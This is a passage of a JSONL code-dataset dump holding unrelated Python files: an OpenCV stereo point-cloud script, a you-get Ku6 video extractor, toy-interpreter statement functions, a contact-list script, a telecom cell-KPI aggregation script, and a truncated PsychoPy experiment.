trainData['seg_index']\n del testData['seg_index']\n trainData.to_csv('trainData.csv',index=False)\n testData.to_csv('testData.csv',index=False)","sub_path":"GenerateData.py","file_name":"GenerateData.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615595456","text":"import argparse\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n#load calibData\nwith np.load('calibData.npz') as X:\n mtx, dist, rvecs, tvecs = [X[i] for i in ('mtx','dist','rvecs','tvecs')]\n\n# def build_arg_parser():\n# parser = argparse.ArgumentParser(description='Reconstruct the 3D map from \\\n# the two input stereo images. Output will be saved in \\'output.ply\\'')\n# parser.add_argument(\"--image-left\", dest=\"image_left\", required=True,\n# help=\"Input image captured from the left\")\n# parser.add_argument(\"--image-right\", dest=\"image_right\", required=True,\n# help=\"Input image captured from the right\")\n# parser.add_argument(\"--output-file\", dest=\"output_file\", required=True,\n# help=\"Output filename (without the extension) where the point cloud will be saved\")\n# return parser\n\ndef update(val = 0):\n # disparity range is tuned for 'aloe' image pair\n stereo.setBlockSize(cv2.getTrackbarPos('window_size', 'disparity'))\n stereo.setUniquenessRatio(cv2.getTrackbarPos('uniquenessRatio', 'disparity'))\n stereo.setSpeckleWindowSize(cv2.getTrackbarPos('speckleWindowSize', 'disparity'))\n stereo.setSpeckleRange(cv2.getTrackbarPos('speckleRange', 'disparity'))\n stereo.setDisp12MaxDiff(cv2.getTrackbarPos('disp12MaxDiff', 'disparity'))\n\n print ('computing disparity...')\n disp = stereo.compute(imgL, imgR).astype(np.float32) / 16.0\n disp = np.where(disp<0, 0, disp)\n cv2.imshow('left', imgL)\n cv2.imshow('disparity', disp)\n cv2.imshow('disparity', (disp-min_disp)/num_disp)\n # cv2.imshow('disparity1', (disp1-min_disp)/num_disp)\n print(np.shape((disp-min_disp)/num_disp))\n return ((disp-min_disp)/num_disp, disp)\n \ndef undestort(img):\n # img = cv2.imread('imgT2.jpg')\n h, w = img.shape[:2]\n # print(h, w)\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n\n # undistort\n # dst = cv2.undistort(img, mtx, dist, None, newcameramtx)\n mapx, mapy = cv2.initUndistortRectifyMap(mtx, dist, None, newcameramtx, (w,h), 5)\n dst = cv2.remap(img, mapx, mapy, cv2.INTER_LINEAR)\n\n # crop the image\n x,y,w,h = roi\n\n # print(x,y,w,h)\n dst = dst[y:y+h, x:x+w]\n # cv2.imwrite('calibresult.png',dst)\n return dst\n\ndef smoothImage(img):\n # kernel = np.ones((6,6),np.float32)/25\n # dst = cv2.filter2D(img,-1,kernel)\n # dst = cv2.blur(img,(5,5))\n dst = cv2.GaussianBlur(img,(7,7),0)\n return dst\n\ndef create_output(vertices, colors, filename):\n colors = colors.reshape(-1, 3)\n vertices = np.hstack([vertices.reshape(-1,3), colors])\n\n ply_header = '''ply\n format ascii 1.0\n element vertex %(vert_num)d\n property float x\n property float y\n property float z\n property uchar red\n property uchar green\n property uchar blue\n end_header\n '''\n\n # with open(filename, 'wb') as f:\n # f.write(ply_header % dict(vert_num=len(vertices)))\n # np.savetxt(f, vertices, '%f %f %f %d %d %d')\n\n\nif __name__ == \"__main__\":\n # args = build_arg_parser().parse_args()\n # image_left = cv2.imread(args.image_left)\n # image_right = cv2.imread(args.image_right)\n output_file = \"3Ddata\" + '.ply'\n\n window_size = 5\n min_disp = 16\n max_disp = min_disp * 9\n # num_disp = 192-min_disp\n num_disp = max_disp - min_disp\n blockSize = window_size\n uniquenessRatio = 1\n speckleRange = 3\n speckleWindowSize = 3\n disp12MaxDiff = 200\n P1 = 600\n P2 = 2400\n imgR = cv2.imread('imgLeft.png')\n # imgR = smoothImage(undestort(imgR))\n imgL = cv2.imread('imgRight.png')\n # imgL = smoothImage(undestort(imgL))\n # imgL = cv2.pyrDown(imgL)\n # imgR = cv2.pyrDown(imgR) \n cv2.namedWindow('disparity')\n cv2.createTrackbar('speckleRange', 'disparity', speckleRange, 50, update) \n cv2.createTrackbar('window_size', 'disparity', window_size, 21, update)\n cv2.createTrackbar('speckleWindowSize', 'disparity', speckleWindowSize, 200, update)\n cv2.createTrackbar('uniquenessRatio', 'disparity', uniquenessRatio, 50, update)\n cv2.createTrackbar('disp12MaxDiff', 'disparity', disp12MaxDiff, 250, update)\n\n stereo = cv2.StereoSGBM_create(\n minDisparity = min_disp,\n numDisparities = num_disp,\n blockSize = window_size,\n uniquenessRatio = uniquenessRatio,\n speckleRange = speckleRange,\n speckleWindowSize = speckleWindowSize,\n disp12MaxDiff = disp12MaxDiff,\n P1 = P1,\n P2 = P2\n )\n\n dtk, disp = update()\n cv2.waitKey()\n cv2.destroyAllWindows()\n \n \n print (\"\\nGenerating the 3D map ...\")\n h, w = imgL.shape[:2]\n focal_length = 0.8*w\n\n # Perspective transformation matrix\n Q = np.float32([[1, 0, 0, -w/2.0],\n [0,-1, 0, h/2.0],\n [0, 0, 0, -focal_length],\n [0, 0, 1, 0]])\n\n \n points_3D = cv2.reprojectImageTo3D(disp, Q)\n colors = cv2.cvtColor(imgL, cv2.COLOR_BGR2RGB)\n mask_map = disp > disp.min()\n output_points = points_3D[mask_map]\n output_colors = colors[mask_map]\n\n print('points', output_points.shape)\n # np.savez('3Ddata', output_points=output_points, output_colors=output_colors)\n print (\"\\nCreating the output file ...\\n\")\n create_output(output_points, output_colors, output_file)\n\n plt.imshow(disp, 'gray')\n # plt.imshow(dtk, 'gray')\n plt.show()","sub_path":"CreateIP13D.py","file_name":"CreateIP13D.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587935023","text":"#!/usr/bin/env python\n\nfrom ..common import *\n\nimport json\nfrom ..extractor import VideoExtractor\n\nclass Ku6(VideoExtractor):\n name = \"酷6 (Ku6)\"\n\n def prepare(self, **kwargs):\n assert self.url or self.vid\n if self.url and not self.vid:\n self.vid = match1(self.url, 'http://v.ku6.com/special/show_\\d+/(.*)\\.html',\n 'http://v.ku6.com/show/(.*)\\.html',\n 'http://my.ku6.com/watch\\?.*v=(.*).*')\n self.ku6_download_by_id()\n\n def ku6_download_by_id(self):\n data = json.loads(get_html('http://v.ku6.com/fetchVideo4Player/%s.html' % self.vid))['data']\n self.title = data['t']\n f = data['f']\n\n\n urls = f.split(',')\n ext = re.sub(r'.*\\.', '', urls[0])\n assert ext in ('flv', 'mp4', 'f4v'), ext\n ext = {'f4v': 'flv'}.get(ext, ext)\n size = 0\n for url in urls:\n _, _, temp = url_info(url)\n size += temp\n\n self.streams['current'] = {'container': ext, 'src': urls, 'size' : size}\n self.stream_types.append('current')\n\nsite = Ku6()\ndownload = site.download_by_url\ndownload_playlist = playlist_not_supported('ku6')\n","sub_path":"you_get/extractors/ku6.py","file_name":"ku6.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210535018","text":"from src.Parser.AST.common import *\nfrom src.Parser.AST.arrays import *\n\nfrom Helpers.environment import *\nfrom Helpers.common import BoxedArrayWrap, UnboxedArrayWrap\n\n\"\"\"\nAssign statement def for AST.\neval - runtime function for Evaluator (return variable by name from environment).\nExample: x := 56\n\"\"\"\ndef assign_statement(env, variable, aexp):\n value = aexp.eval(env)\n if isinstance(variable, ArrayElement):\n arr_descr = variable\n index = arr_descr.index.eval(env)\n arr = Environment(env).get(arr_descr.array)\n value_is_array = isinstance(aexp, UnboxedArrayWrap) or isinstance(aexp, BoxedArrayWrap)\n array_is_unboxed = isinstance(arr, UnboxedArrayWrap)\n if value_is_array or array_is_unboxed:\n arr[index] = value\n else:\n arr[index] = Pointer(env, aexp)\n Environment(env).set(arr_descr.array, arr)\n else:\n name = variable.name\n Environment(env).set(name, value)\n\n\"\"\"\nCompound statement def for AST.\neval - runtime function for Evaluator (eval first and second statement operators).\n\"\"\"\ndef compound_statement(env, first, second):\n first.eval(env)\n second.eval(env)\n\n\"\"\"\n'If' statement def for AST.\neval - runtime function for Evaluator (true of false statement depending on condition).\n\"\"\"\ndef if_statement(env, condition, true_stmt, alternatives_stmt, false_stmt):\n condition_value = condition.eval(env)\n if condition_value:\n true_stmt.eval(env)\n else:\n if alternatives_stmt:\n for alternative_stmt in alternatives_stmt:\n alternative_condition_value = alternative_stmt.eval(env)\n if alternative_condition_value:\n return True\n if false_stmt:\n false_stmt.eval(env)\n return condition_value\n\n\"\"\"\n'While' statement def for AST.\neval - runtime function for Evaluator (body eval while condition).\n\"\"\"\ndef while_statement(env, condition, body):\n while condition.eval(env):\n body.eval(env)\n\n\"\"\"\n'For' statement def for AST.\neval - runtime function for Evaluator ('for' loop).\n\"\"\"\ndef for_statement(env, stmt1, stmt2, stmt3, body):\n stmt1.eval(env)\n while stmt2.eval(env):\n iteration_env = Environment(env).create()\n body.eval(iteration_env)\n stmt3.eval(env)\n return\n\n\"\"\"\n'Repeat' statement def for AST.\neval - runtime function for Evaluator (body eval while condition).\n\"\"\"\ndef repeat_statement(env, condition, body):\n while True:\n body.eval(env)\n condition_value = condition.eval(env)\n if condition_value:\n break\n\n\"\"\"\n'Skip' statement def for AST.\neval - runtime function for Evaluator (empty function).\n\"\"\"\ndef skip_statement(env): pass\n","sub_path":"src/Interpreter/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"290838757","text":"#!/usr/bin/python3\n\nimport numpy as np\n\nl = []\nwhile True:\n option = int(input(\"1: Add\\n2: Search\\n3: Exit\\nSelect: \"))\n if option == 1:\n l.append([input(\"Name: \"), int(input(\"Cell No: \")), input(\"Email ID: \")])\n elif option == 2:\n q = input(\"Query: \")\n if len(list([print(i) for i in l if i[0] == q])) == 0:\n print(\"Not found\")\n else:\n np.save(\"file\", np.array(l), allow_pickle=True)\n break\n","sub_path":"binaryrecordsearch.py","file_name":"binaryrecordsearch.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"258734011","text":"#!/usr/bin/python3\n\nimport csv\nimport core.Helpers as hlp\nimport os\nimport re\nimport sys\n\nfrom datetime import datetime\nfrom core.Configuration import Configuration\nfrom core.Database import Database\n\n\"\"\"\npython3 cells_by_controller_weigth.py LU eri:3g\npython3 cells_by_controller_weigth.py LU eri:3g 20180625_1530\npython3 cells_by_controller_weigth.py rnc140\npython3 cells_by_controller_weigth.py rnc140 20180625_1530\npython3 cells_by_controller_weigth.py rnc140 hua:3g 20180625_1530\npython3 cells_by_controller_weigth.py MAD06R05\npython3 cells_by_controller_weigth.py ara7176_2g all\n\"\"\"\n\ndb = None\nconfig = None\n\ndef exit_process(label, text):\n print('%s:%s' % (label, text))\n exit()\n\ndef get_controller_info(controller, vendor=None, tech=None):\n \"\"\" Filtro el controlador a procesar. \"\"\"\n # Compruebo si es una RNC o BSC\n query = \"SELECT 'controller_id', id, vendor, tech, name FROM public.controllers WHERE name=%s\"\n query = \"%s AND vendor='%s' AND tech='%s'\" % (query, vendor, tech) if vendor != None else query\n response = db.fetchData(query, [controller])\n if len(response) > 0: return response\n\n # Compruebo si es una provincia\n response = db.fetchData(\n \"SELECT 'province_id', id, %s as vendor, %s as tech, code FROM public.provinces WHERE code=%s\",\n [vendor, tech, controller])\n if len(response) > 0: return response\n\n # Asumo que es un cluster\n if vendor != None and tech != None:\n return db.fetchData(\n \"SELECT 'cluster', %s, vendor, tech, %s FROM public.cells WHERE UPPER(cluster)=%s AND vendor=%s AND tech=%s GROUP BY vendor, tech\",\n [controller, controller, controller, vendor, tech])\n\n return db.fetchData(\n \"SELECT 'cluster', %s, vendor, tech, %s FROM public.cells WHERE UPPER(cluster)=%s GROUP BY vendor, tech\",\n [controller, controller, controller])\n\n\nif __name__=='__main__':\n\n # Obtengo los argumentos de entrada\n date_time_now = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n controller_name = None\n vendor = None\n tech = None\n date = None\n\n for i in range(1, len(sys.argv)):\n value = sys.argv[i].lower()\n if i == 1:\n controller_name = value.upper()\n elif i == 2:\n if ':' in value: vendor, middle, tech = value.partition(':')\n elif i == 3:\n date = hlp.str_to_datetime(value, '%Y%m%d_%H%M')\n else:\n exit_process('WARNING', 'Numero de argumentos de entrada incorrectos.')\n\n # Cargo el fichero de configuracion basica y de kpis en memoria\n config = Configuration(os.path.join(os.path.dirname(__file__) , 'config.yml'))\n\n KPIS_TO_PROCESS = config.get_as_array('kpis_to_process_weigth')\n\n # Realizo validacions basicas sobre el vendor y la tecnologia\n if (vendor != None and not vendor in config.get_as_array('option.vendors')) or \\\n (tech != None and not tech in config.get_as_array('option.technologies')):\n exit_process('ERROR', 'Vendor o tecnologia incorrecta.')\n\n # Establezco la conexion a la base de datos\n db = Database(\n config.get('database.host'),\n config.get('database.name'),\n config.get('database.user'),\n config.get('database.password'))\n\n if db.connect() == False: exit_process('ERROR', 'No se ha podido establecer la conexión a la base de datos.')\n\n # Filtro los controladores (en HUA RS una RNC puede tener celdas 2G)\n controllers = get_controller_info(controller_name, vendor, tech)\n\n # Valido los controladores a procesar\n for controller in controllers:\n if controller[0] == 'province_id' and (controller[2] == None or controller[3] == None):\n exit_process('WARNING', 'No se puede filtrar por provinca sin vendor o tecnologia.')\n\n # Recorro cada vendor-tecnologia del controlador filtrado\n output_files = []\n for controller in controllers:\n controller_type = controller[0]\n controller_id = controller[1]\n vendor = controller[2]\n tech = controller[3]\n\n # Filtro las celdas por el controlador, vendor y tecnologia actual\n query = \"SELECT id FROM public.cells WHERE {where_id} {where};\".format(\n where_id=\"UPPER({0})='{1}'\".format(controller_type, controller_id) if controller_type == 'cluster' else \"{0}={1}\".format(controller_type, controller_id),\n where=\"AND vendor='%s' AND tech='%s'\" % (vendor, tech) if vendor != None else '')\n\n response = db.fetchData(query)\n if len(response) == 0: exit_process('WARNING', 'El controlador filtrado no contiene celdas.')\n cells_ids_string = ','.join([str(cell[0]) for cell in response])\n\n # Obtengo el ultimo rop disponible\n span = 'hour' if vendor == 'eri' and tech == '2g' else 'rop'\n where_date = \" AND created_at <= '%s'\" % date if date != None else ''\n query = \"SELECT MAX(created_at) FROM {vendor}.counters_{tech}_cell_{span} WHERE item_id IN ({items}) {where_date}\".format(\n vendor=vendor, tech=tech, span=span, items=cells_ids_string, where_date=where_date)\n\n response = db.fetchData(query)\n if len(response) == 0: exit_process('ERROR', 'No ha datos ROPs cargados para las celdas del controlador.')\n rop = response[0][0].strftime('%Y-%m-%d %H:%M')\n rop_to_file = response[0][0].strftime('%Y%m%d_%H%M')\n\n # Obtengo los kpis ha procesar y reemplazo los parciales por sus ecuaciones\n query = \"\"\"\n SELECT ('p' || id::text) as id, type, name, equation from kpis\n WHERE type IN ('std', 'prt') AND vendor='{vendor}' AND tech='{tech}'\n ORDER BY type DESC, id DESC;\n \"\"\".format(vendor=vendor, tech=tech)\n response = db.fetchData(query)\n\n kpis = {}\n for item in response:\n item_id = item[0]\n item_type = item[1]\n item_name = item[2]\n item_equation = item[3].replace('@', '')\n if item_type == 'std':\n if item_name in KPIS_TO_PROCESS:\n kpis[item_name] = {'name': item_name, 'equation': item_equation}\n else:\n for k, v in kpis.items():\n if item_id in v['equation']:\n v['equation'] = v['equation'].replace(item_id, '(%s)' % item_equation)\n\n fields_set = set()\n for i, v in kpis.items():\n lst = re.findall('c[0-9]+', v['equation'])\n fields_set.update(lst)\n\n fields_set = sorted(fields_set, reverse=True)\n fields_string = ','.join(x for x in fields_set)\n\n # Creo un array con la posicion correspondiente a cada campo\n fields_idx = {}\n fields_idx['created_at'] = 0\n fields_idx['cell'] = 1\n fields_idx['node'] = 2\n counter = 3\n for x in fields_set:\n fields_idx[x] = counter\n counter += 1\n\n # Obtengo los contadores\n query = \"\"\"\n SELECT ct.created_at, cl.name, n.name, {fields}\n FROM {vendor}.counters_{tech}_cell_{span} as ct\n INNER JOIN public.cells as cl ON cl.id = ct.item_id\n LEFT JOIN public.nodes as n ON n.id = cl.node_id\n WHERE created_at = '{rop}' AND item_ID IN ({items})\n \"\"\".format(fields=fields_string, vendor=vendor, tech=tech, span=span, rop=rop, items=cells_ids_string)\n rows = db.fetchData(query)\n\n # sumo todos los contadores para hacer el agregado por controlador\n counters_total = {}\n for row in rows:\n if len(counters_total) == 0:\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node']:\n counters_total[k] = row[v] if row[v] != None else 0\n continue\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node'] and row[v] != None:\n counters_total[k] = counters_total[k] + row[v]\n\n # Hago el sumatorio de todos los contadores\n processed_data = []\n for row in rows:\n item = {\n 'created_at': row[fields_idx['created_at']].strftime('%Y-%m-%d %H:%M'),\n 'cell': row[fields_idx['cell']],\n 'node': row[fields_idx['node']] if row[fields_idx['node']] != None else ''}\n\n for kpi_name, kpi_values in kpis.items():\n kpi_name_controller = '%s_controller' % kpi_name\n item[kpi_name] = 'DIV0'\n item[kpi_name_controller] = 'DIV0'\n equation = kpi_values['equation']\n equation_controller = kpi_values['equation']\n\n for k, v in fields_idx.items():\n if not k in ['created_at', 'cell', 'node']:\n value = row[v]\n equation = equation.replace(k, str(value))\n value = counters_total[k]-value if value != None else 0\n equation_controller = equation_controller.replace(k, str(value))\n\n try:\n item[kpi_name] = '%.3f' % eval(equation)\n except:\n pass\n\n try:\n item[kpi_name_controller] = '%.6f' % eval(equation_controller)\n except:\n pass\n processed_data.append(item)\n\n fieldnames = ['created_at', 'cell', 'node']\n for kpi_name, kpi_values in kpis.items():\n fieldnames.append(kpi_name)\n fieldnames.append('%s_controller' % kpi_name)\n\n # Creo el fichero de salida\n output_file = config.get('path.output') + '%s_%s_%s_%s.csv' % (date_time_now, controller[4], vendor, tech)\n with open (output_file, 'w') as f:\n output_files.append(output_file)\n writer = csv.DictWriter(f, fieldnames=fieldnames, delimiter=\";\")\n writer.writeheader()\n for row in processed_data:\n writer.writerow(row)\n\n if len(output_files) == 0: exit_process('INFO', 'Proceso finalizado sin resultado.')\n\n # Si hay varias tecnologias en el controlador, creo un zip con los diferentes ficheros\n if len(output_files) > 1:\n output_file = config.get('path.output') + '%s_%s.zip' % (date_time_now, controller_name)\n command = 'zip -qjTm %s %s' % (output_file, ' '.join(output_files))\n if os.system(command) != 0: exit_process('ERROR', 'Error comprimiendo los ficheros de salida.')\n\n exit_process('FILE', output_file)\n","sub_path":"scripts/scripts_genericos_herramienta/cells_by_controller_weigth.py","file_name":"cells_by_controller_weigth.py","file_ext":"py","file_size_in_byte":10493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460272222","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.82.01), Tue Jan 5 16:59:46 2016\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division # so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, sound, gui\nfrom psychopy.constants import * # things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nimport os # handy system and path functions\n\n# Ensure that relative paths start from the same directory as this script\n_thisDir = os.path.dirname(os.path.abspath(__file__))\nos.chdir(_thisDir)\n\n# Store info about the experiment session\nexpName = u'TestExamples' # from the Builder filename that created this script\nexpInfo = {u'session': u'001', u'participant': u''}\nexpInfo['date'] = data.getDateStr() # add a simple timestamp\nexpInfo['expName'] = expName\n\n# Data file name stem = absolute path + name; later add .psyexp, .csv, .log, etc\nfilename = _thisDir + os.sep + 'data/%s_%s_%s' %(expInfo['participant'], expName, expInfo['date'])\n\n# An ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=u'/Users/jason/Dropbox/SteffenerColumbia/Scripts/ExperimentalStimuli/PartialTrialDIR/TestExamples.psyexp',\n savePickle=True, saveWideText=False,\n dataFileName=filename)\nlogging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file\n\nendExpNow = False # flag for 'escape' or other condition => quit the exp\n\n# Start Code - component code to be run before the window creation\n\n# Setup the Window\nwin = visual.Window(size=[800, 600], fullscr=False, screen=0, allowGUI=True, allowStencil=False,\n monitor=u'testMonitor', color=[0,0,0], colorSpace='rgb',\n blendMode='add', useFBO=True,\n units='norm')\n# store frame rate of monitor if we can measure it successfully\nexpInfo['frameRate']=win.getActualFrameRate()\nif expInfo['frameRate']!=None:\n frameDur = 1.0/round(expInfo['frameRate'])\nelse:\n frameDur = 1.0/60.0 # couldn't get a reliable measure so guess\n\n# Initialize components for Routine \"trial\"\ntrialClock = core.Clock()\nISI = core.StaticPeriod(win=win, screenHz=expInfo['frameRate'], name='ISI')\nTopUpperLine_2 = visual.Line(win=win, name='TopUpperLine_2',units='norm', \n start=(-[2, 0.95][0]/2.0, 0), end=(+[2, 0.95][0]/2.0, 0),\n ori=0, pos=[0, 0.65],\n lineWidth=2, lineColor=[1,1,-1], lineColorSpace='rgb',\n fillColor='[1,1,-1]', fillColorSpace='rgb',\n opacity=1,depth=-1.0, \ninterpolate=True)\nUpperText_2 = visual.TextStim(win=win, ori=0, name='UpperText_2',\n text='default text', font=u'Courier',\n units='norm', pos=[0, 0.4], height=0.2, wrapWidth=1.5,\n color=[0,0,0], colorSpace='rgb', opacity=1,\n depth=-2.0)\nUpperBrackets_2 = visual.TextStim(win=win, ori=0, name='UpperBrackets_2',\n text='default text', font=u'Courier',\n units='norm', pos=[0, 0.4], height=0.2, wrapWidth=1.5,\n color=u'yellow', colorSpace='rgb', opacity=1,\n depth=-3.0)\nBotUpperLine_2 = visual.Line(win=win, name='BotUpperLine_2',units='norm', \n start=(-[2, 0.95][0]/2.0, 0), end=(+[2, 0.95][0]/2.0, 0),\n ori=0, pos=[0, 0.15],\n lineWidth=2, lineColor=[1,1,-1], lineColorSpace='rgb',\n fillColor='yellow', fillColorSpace='rgb',\n opacity=1,depth=-4.0, \ninterpolate=True)\nTopLowerLine_2 = visual.Line(win=win, name='TopLowerLine_2',units='norm', \n start=(-[2, 0.5][0]/2.0, 0), end=(+[2, 0.5][0]/2.0, 0),\n ori=0, pos=[0, -0.15],\n lineWidth=2, lineColor='cyan', lineColorSpace='rgb',\n fillColor='cyan', fillColorSpace='rgb',\n opacity=1,depth=-5.0, \ninterpolate=True)\nLowerText_2 = visual.TextStim(win=win, ori=0, name='LowerText_2',\n text='default text', font=u'Courier',\n units='norm', pos=[0, -0.4], height=0.2, wrapWidth=2,\n color=[0,0,0], colorSpace='rgb', opacity=1,\n depth=-6.0)\nLowerBrackets_2 = visual.TextStim(win=win, ori=0, name='LowerBrackets_2',\n text=u' { } ', font=u'Courier',\n units='norm', pos=[0, -0.4], height=0.2, wrapWidth=None,\n color=u'cyan', colorSpace='rgb', opacity=1,\n depth=-7.0)\nBotLowerLine_2 = visual.Line(win=win, name='BotLowerLine_2',units='norm', \n start=(-[2, 0.5][0]/2.0, 0), end=(+[2, 0.5][0]/2.0, 0),\n ori=0, pos=[0, -0.65],\n lineWidth=2, lineColor='cyan', lineColorSpace='rgb',\n fillColor='cyan', fillColorSpace='rgb',\n opacity=1,depth=-8.0, \ninterpolate=True)\nTrialCrossHair_2 = visual.TextStim(win=win, ori=0, name='TrialCrossHair_2',\n text='+', font='Arial',\n units='norm', pos=[0, 0], height=0.2, wrapWidth=None,\n color='green', colorSpace='rgb', opacity=1,\n depth=-9.0)\nRestCrossHair_2 = visual.TextStim(win=win, ori=0, name='RestCrossHair_2',\n text='+', font='Arial',\n units='norm', pos=[0, 0], height=0.2, wrapWidth=None,\n color='red', colorSpace='rgb', opacity=1,\n depth=-10.0)\n\n# Create some handy timers\nglobalClock = core.Clock() # to track the time since experiment started\nroutineTimer = core.CountdownTimer() # to track time remaining of each (non-slip) routine \n\n#------Prepare to start Routine \"trial\"-------\nt = 0\ntrialClock.reset() # clock \nframeN = -1\nroutineTimer.add(13.000000)\n# update component parameters for each repeat\nUpperText_2.setText(u' L K R G M X ')\nUpperBrackets_2.setText(u' { }')\nLowerText_2.setText(u'btygqj')\nKeyboardResp_2 = event.BuilderKeyResponse() # create an object of type KeyResponse\nKeyboardResp_2.status = NOT_STARTED\n# keep track of which components have finished\ntrialComponents = []\ntrialComponents.append(ISI)\ntrialComponents.append(TopUpperLine_2)\ntrialComponents.append(UpperText_2)\ntrialComponents.append(UpperBrackets_2)\ntrialComponents.append(BotUpperLine_2)\ntrialComponents.append(TopLowerLine_2)\ntrialComponents.append(LowerText_2)\ntrialComponents.append(LowerBrackets_2)\ntrialComponents.append(BotLowerLine_2)\ntrialComponents.append(TrialCrossHair_2)\ntrialComponents.append(RestCrossHair_2)\ntrialComponents.append(KeyboardResp_2)\nfor thisComponent in trialComponents:\n if hasattr(thisComponent, 'status'):\n thisComponent.status = NOT_STARTED\n\n#-------Start Routine \"trial\"-------\ncontinueRoutine = True\nwhile continueRoutine and routineTimer.getTime() > 0:\n # get current time\n t = trialClock.getTime()\n frameN = frameN + 1 # number of completed frames (so 0 is the first frame)\n # update/draw components on each frame\n \n # *TopUpperLine_2* updates\n if t >= 0 and TopUpperLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TopUpperLine_2.tStart = t # underestimates by a little under one frame\n TopUpperLine_2.frameNStart = frameN # exact frame index\n TopUpperLine_2.setAutoDraw(True)\n if TopUpperLine_2.status == STARTED and t >= (0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n TopUpperLine_2.setAutoDraw(False)\n \n # *UpperText_2* updates\n if t >= 0 and UpperText_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n UpperText_2.tStart = t # underestimates by a little under one frame\n UpperText_2.frameNStart = frameN # exact frame index\n UpperText_2.setAutoDraw(True)\n if UpperText_2.status == STARTED and t >= (0 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n UpperText_2.setAutoDraw(False)\n \n # *UpperBrackets_2* updates\n if t >= 0.0 and UpperBrackets_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n UpperBrackets_2.tStart = t # underestimates by a little under one frame\n UpperBrackets_2.frameNStart = frameN # exact frame index\n UpperBrackets_2.setAutoDraw(True)\n if UpperBrackets_2.status == STARTED and t >= (0.0 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n UpperBrackets_2.setAutoDraw(False)\n \n # *BotUpperLine_2* updates\n if t >= 0.0 and BotUpperLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n BotUpperLine_2.tStart = t # underestimates by a little under one frame\n BotUpperLine_2.frameNStart = frameN # exact frame index\n BotUpperLine_2.setAutoDraw(True)\n if BotUpperLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n BotUpperLine_2.setAutoDraw(False)\n \n # *TopLowerLine_2* updates\n if t >= 0.0 and TopLowerLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TopLowerLine_2.tStart = t # underestimates by a little under one frame\n TopLowerLine_2.frameNStart = frameN # exact frame index\n TopLowerLine_2.setAutoDraw(True)\n if TopLowerLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n TopLowerLine_2.setAutoDraw(False)\n \n # *LowerText_2* updates\n if t >= 7 and LowerText_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n LowerText_2.tStart = t # underestimates by a little under one frame\n LowerText_2.frameNStart = frameN # exact frame index\n LowerText_2.setAutoDraw(True)\n if LowerText_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n LowerText_2.setAutoDraw(False)\n \n # *LowerBrackets_2* updates\n if t >= 7 and LowerBrackets_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n LowerBrackets_2.tStart = t # underestimates by a little under one frame\n LowerBrackets_2.frameNStart = frameN # exact frame index\n LowerBrackets_2.setAutoDraw(True)\n if LowerBrackets_2.status == STARTED and t >= (7 + (2-win.monitorFramePeriod*0.75)): #most of one frame period left\n LowerBrackets_2.setAutoDraw(False)\n \n # *BotLowerLine_2* updates\n if t >= 0.0 and BotLowerLine_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n BotLowerLine_2.tStart = t # underestimates by a little under one frame\n BotLowerLine_2.frameNStart = frameN # exact frame index\n BotLowerLine_2.setAutoDraw(True)\n if BotLowerLine_2.status == STARTED and t >= (0.0 + (13-win.monitorFramePeriod*0.75)): #most of one frame period left\n BotLowerLine_2.setAutoDraw(False)\n \n # *TrialCrossHair_2* updates\n if t >= 0 and TrialCrossHair_2.status == NOT_STARTED:\n # keep track of start time/frame for later\n TrialCrossHair_2.tStart = t # underestimates by a little under one frame\n TrialCrossHair_2.frameNStart = frameN # exact frame index\n TrialCrossHair_2.setAutoDraw(True)\n if TrialCrossHair_2.status == STARTED and t >= (0 + (9-win.monitorFramePeriod*0.75)): #most of one frame period left\n TrialCrossHair_2.setAutoDraw(False)\n \n # *RestCrossHair_2* updates\n if t >= 9 and RestCrossHair_2.status == NOT_STARTED:\n # 